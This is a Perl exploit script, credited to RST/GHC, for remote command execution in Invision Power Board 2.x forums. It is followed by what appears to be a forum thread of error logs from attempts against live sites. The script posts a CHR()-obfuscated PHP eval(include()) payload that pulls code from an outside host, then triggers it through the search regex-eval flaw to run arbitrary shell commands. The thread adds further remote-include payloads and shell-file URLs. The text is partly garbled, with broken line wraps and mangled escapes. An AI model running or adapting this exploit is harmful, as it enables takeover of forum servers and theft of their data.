$sock = IO::Socket::INET- >new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[- ] CONNECTION FAILED"; if($version==1) { print $sock "GET ${dir}index.php?act=post&do=new_post&f=${forum} HTTP/1 .1\r\n"; } else { print $sock "GET ${dir}index.php?act=Post&CODE=00&f=${forum} HTTP/1.1\ r\n"; } print $sock "Host: $host\r\n"; print $sock "Cookie: session_id=$sid;\r\n"; print $sock "Connection: close\r\n\r\n"; while (<$sock>) { if($version == 1 && /ipb_md5_checks*= "([a-f|0- 9]{32})\"/) { $md5_check = $1; last; } if($version == 0 && /auth_key' value='([a-f|0- 9]{32})/) { $md5_check = $1; last; } } close($sock); if($md5_check) { print " [ DONE ]rn"; print "[+] MD5_CHECK : $md5_checkrn"; } else { print " [ FAILED ]rn"; exit(); } print "[~] Create new message "; $sock = IO::Socket::INET- >new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[- ] CONNECTION FAILED"; $created = 0; $text = 'piptest2eval(include(CHR(104).CHR(116).CHR(116).CHR(112).CHR(58) .CHR(47).CHR(47).CHR(54).CHR(54).CHR(46).CHR(49).CHR(57).CHR(57).CH R(46).CHR(49).CHR(56).CHR(49).CHR(46).CHR(49).CHR(52).CHR(52).CHR(4 7).CHR(126).CHR(100).CHR(101).CHR(109).CHR(111).CHR(100).CHR(101).C HR(109).CHR(111).CHR(47).CHR(109).CHR(105).CHR(115).CHR(99).CHR(46) .CHR(116).CHR(120).CHR(116))); //'; $post = "st=0&act=Post&s=&f=${forum}&auth_key=${md5_check}&removeatta chid=0&CODE=01&post_key=&TopicTitle=justxpl&TopicDesc=justxpl&poll_qu estion=&ffont=0&fsize=0&Post=${text}&enableemo=yes&enablesig=yes&iconid =0"; print $sock "POST ${dir}index.php HTTP/1.1rn"; print $sock "Host: $hostrn"; print $sock "Cookie: session_id=$sid;rn"; print $sock "Connection: closern"; print $sock "Content-Type: application/x-www-form-urlencodedn"; print $sock "Content-length: ".length($post)."rnrn"; print $sock "$post"; print $sock "rnrn"; while (<$sock>) { if(/Location:/) { $created = 1; last; } } if($created) { print " [ DONE ]rn"; } else { print " [ FAILED ]rn"; exit(); } $sock = IO::Socket::INET- >new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[- ] CONNECTION FAILED"; print "[~] Search message "; $post = 'keywords=piptest2&namesearch='.$login.'&forums%5B%5D=all&search subs=1&prune=0&prune_type=newer&sort_key=last_post&sort_order=desc&sear ch_in=posts&result_type=posts'; print $sock "POST ${dir}index.php?act=Search&CODE=01 HTTP/1.1rn"; print $sock "Host: $hostrn"; print $sock "Cookie: session_id=$sid;rn"; print $sock "Connection: closern"; print $sock "Content-Type: application/x-www-form-urlencodedn"; print $sock "Content-length: ".length($post)."rnrn"; print $sock "$post"; print $sock "rnrn"; while (<$sock>) { if(/searchid=([a-f|0-9]{32})/) { $searchid = $1; last; } } if($searchid) { print " [ DONE ]rn"; } else { print "[ FAILED ]rn"; exit(); } print "[+] SEARCHID: $searchidrn"; $get = 'index.php?act=Search&CODE=show&searchid='.$searchid.'&search_in=p osts&result_type=posts&highlite=piptest2&lastdate=z|eval.*?%20//)%23e%00'; $link_r57= $host.$dir.'index.php?act=Search&CODE=show&searchid='.$searchid .'&search_in=posts&result_type=posts&highlite=piptest2&lastdate=z|eval.*?%20// )%23e%00'; print "File's place:"; $save=<STDIN>; print "open $save and have fun :D "; open OUTPUT, ">".$save; print OUTPUT "$link_r57"; sub run() { $cmd =~ s/(.*);$/$1/eg; $cmd =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $cmd2 = '%65%63%68%6F%20%5F%53%54%41%52%54%5F%20%26%26% 20'; $cmd2 .= $cmd; $cmd2 .= '%20%26%26%20%65%63%68%6F%20%5F%45%4E%44%5F'; $sock = IO::Socket::INET- >new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[- ] CONNECTION FAILED"; print $sock "GET ${dir}${get}&eharniy_ekibastos=$cmd2 HTTP/1.1rn"; print $sock "Host: $hostrn"; print $sock "Cookie: session_id=$sid;rn"; print $sock "Connection: closernrn"; $on = 0; $runned = 0; while ($answer = <$sock>) { if ($answer =~ /^_END_/) { return 0; } if ($on == 1) { print " $answer"; } if ($answer =~ /^_START_/) { $on = 1; } } } sub header() { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~rn"; print " Invision Power Board 2.* commands execution exploit by RST/GHCrn"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~rn"; } sub usage() { print "r57ipbce.pl -h <host> -d <dir> -l <login> -p <password> -f <forum> - v <version>rnrn"; print "<host> - host where IPB installed e.g www.ipb.comrn"; print "<dir> - folder where IPB installed e.g. /forum/ , /ipb/ , etc rn"; print "<login> - login of any exist userrn"; print "<password> - and password too )rn"; print "<forum> - number of forum where user can create topic e.g 2,4, etcrn"; print "<version> - forum version:rn"; print " 0 - 2.0.*rn"; print " 1 - 2.1.*rn"; exit(); } Pip(VNISS) Invision Power Board Multiple Vulnerabilities (bài 7) PB WARNING [2] Unknown(http://66.199.181.144/~demodemo/misc.txt): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found (Line: 1 of /sources/search.php(1236) : regexp code) IPB WARNING [2] Unknown(http://66.199.181.144/~demodemo/misc.txt): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found (Line: 1 of /sources/search.php(1236) : regexp code) IPB WARNING [2] (null)(): Failed opening 'http://66.199.181.144/~demodemo/misc.txt' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') (Line: 1 of /sources/search.php(1236) : regexp code) nclude(CHR(104).CHR(116).CHR(116).CHR(112).CHR(58 ).CHR(47).CHR(47).CHR(105).CHR(116).CHR(118).CHR(1 10).CHR(46).CHR(110).CHR(97).CHR(109).CHR(101).CHR (47).CHR(99).CHR(111).CHR(100).CHR(101).CHR(47).CH R(114).CHR(53).CHR(55).CHR(46).CHR(112).CHR(104).C HR(112))); http://freewebs.com/tmtx/r.txt TMT(vniss) IPB WARNING [2] Unknown(http://66.199.181.144/~demodemo/misc.txt): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found (Line: 1 of /sources/action_public/search.php(1262) : regexp code) IPB WARNING [2] (null)(): Failed opening 'http://66.199.181.144/~demodemo/misc.txt' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') (Line: 1 of /sources/action_public/search.php(1262) : regexp code) IPB WARNING [2] passthru(): Cannot execute a blank command (Line: 5 of http://rst.void.ru/r57ipbinc.txt) Parse error: parse error, unexpected $ in /home2/xclubs/public_html/forum/sources/action_public/search.php(1262) : regexp code(1) : eval()'d code on line 1